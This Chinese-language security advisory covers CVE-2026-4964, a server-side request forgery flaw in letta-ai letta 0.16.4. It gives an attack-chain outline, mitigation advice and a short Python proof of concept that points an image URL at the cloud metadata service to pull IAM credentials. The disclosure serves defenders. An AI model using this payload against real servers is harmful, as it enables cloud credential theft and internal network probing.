CVE-2026-4964 CVSS 6.3 中危

CVE-2026-4964 letta-ai letta服务端请求伪造漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4964

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

letta-ai letta

漏洞概述

letta-ai letta 0.16.4版本存在服务端请求伪造（SSRF）漏洞。攻击者可通过操纵`ImageContent`参数，诱导服务器向内部网络发起恶意请求。该漏洞利用无需复杂权限且无需用户交互，可能导致敏感信息泄露及内网探测。

技术细节

该漏洞位于letta-ai letta的`letta/helpers/message_helper.py`文件的`_convert_message_create_to_message`函数中。由于`File URL Handler`组件在处理图片URL时未对`ImageContent`参数进行有效校验，攻击者可构造包含内网地址（如127.0.0.1或云元数据服务地址）的恶意请求。当服务器解析该参数时，会代为请求指定的内网资源。由于CVSS向量显示攻击复杂度低且权限要求低，远程攻击者可轻易利用此漏洞探测内网拓扑、读取本地敏感文件或结合其他漏洞进行进一步攻击，从而影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用letta-ai letta 0.16.4版本，并确认其API接口可访问。

STEP 2

构造载荷

攻击者构造包含恶意`ImageContent`参数的请求数据，将URL指向内网敏感资源（如云元数据服务或内部管理面板）。

STEP 3

发送请求

攻击者向`_convert_message_create_to_message`接口发送特制的HTTP请求，无需用户交互。

STEP 4

服务端请求

受影响的服务器在处理请求时，解析`ImageContent`并代为向攻击者指定的内网地址发起连接。

STEP 5

信息泄露

服务器将内网资源的响应返回给攻击者，导致敏感信息泄露或为进一步攻击提供线索。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable letta instance
target_url = "http://target-host:port/api/message/create"

# Malicious payload targeting internal metadata service (SSRF)
# Attacker can change the URL to scan internal ports or access local files
malicious_image_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "role": "user",
    "content": "Analyze this image",
    "image_content": {
        "type": "image_url",
        "image_url": {
            "url": malicious_image_url
        }
    }
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=payload)
    print(f"Status Code: {response.status_code}")
    print("Response:")
    print(response.text)
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

letta-ai letta 0.16.4

防御指南

临时缓解措施

建议在网络层面部署防火墙规则，阻断应用服务器对非必要外网及内网敏感IP段（如127.0.0.1、169.254.169.254等）的请求。同时，可通过WAF（Web应用防火墙）添加规则，检测并拦截包含内网IP特征的请求参数，直至完成版本升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4964
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4964
3 Details https://www.cvedetails.com/cve/CVE-2026-4964/
4 VulDB https://vuldb.com/cve/CVE-2026-4964
5 Link https://gist.github.com/YLChen-007/fde4d5ed6ac4aa876f73f8954c6214da
6 Link https://vuldb.com/?ctiid.353841
7 Link https://vuldb.com/?id.353841
8 Link https://vuldb.com/?submit.777645

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表